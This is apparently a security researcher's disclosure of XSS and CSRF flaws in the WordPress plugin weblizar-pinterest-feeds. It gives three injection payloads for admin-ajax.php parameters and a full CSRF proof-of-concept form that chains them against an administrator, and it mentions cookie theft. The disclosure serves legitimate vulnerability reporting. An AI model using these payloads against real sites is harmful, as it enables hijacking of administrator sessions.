Well ,sir ,I just found a XSS bug and a CSRF bug at wp-plugin weblizar-pinterest-feeds.
ADLab of Venustech
XSS
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php
When I pentest the parameter, I found it does not filter well.
Weak data parameters:
1.PFFREE_Access_Token=test'"><svg/onload=console.log(/xss1/)><'"
2.weblizar_pffree_settings_save_get-users=1'"><svg/onload=console.log(/xss2/)><'"
3.action=pffree_security&security=test'"><svg/onload=console.log(/xss3/)><'"
CSRF
Well, the xss here need to combined with a csrf bug. Because no csrf protection here, we can cheat the admin user to visit the evil html on the evil site.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="PFFREE_Access_Token" value="test'"><svg/onload=console.log(/xss1/)><'"" />
<input type="hidden" name="weblizar_pffree_settings_save_get-users" value="1'"><svg/onload=console.log(/xss2/)><'"" />
<input type="hidden" name="action" value="pffree_security" />
<input type="hidden" name="security" value="test'"><svg/onload=console.log(/xss3/)><'"" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In a word, if the manager could be cheated to visit my evil html on my site, I can get the manager's cookie easily, or do something more evilly.
Well, by the way, I just test the bug in the wordpress 4.9.1 and the latest version of the wp-plugin weblizar-pinterest-feeds.
